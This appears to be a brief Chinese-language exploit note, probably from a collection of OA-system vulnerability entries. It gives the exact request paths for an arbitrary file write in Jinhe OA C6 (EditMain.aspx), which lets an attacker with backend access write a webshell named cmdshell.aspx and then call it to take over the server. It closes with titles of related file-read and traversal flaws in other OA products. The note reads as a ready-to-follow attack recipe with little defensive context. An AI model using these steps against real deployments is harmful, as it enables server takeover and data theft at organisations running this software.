金和OA C6 EditMain.aspx 存在任意文件写入漏洞,通过漏洞可以写入恶意文件获取服务器权限
漏洞触发需要后台权限
访问漏洞点 /C6/JHSoft.Web.Portal/EditMain.aspx?id=cmdshell.aspx
/C6/JHSoft.Web.Portal/EditMain.aspx?id=cmdshell.aspx
写入webshell代码保存
再访问 /C6/JHSoft.Web.Portal/Default/cmdshell.aspx
/C6/JHSoft.Web.Portal/Default/cmdshell.aspx
红帆OA ioFileExport.aspx 任意文件读取漏洞 金和OA C6 OpenFile.aspx 后台越权敏感文件遍历漏洞
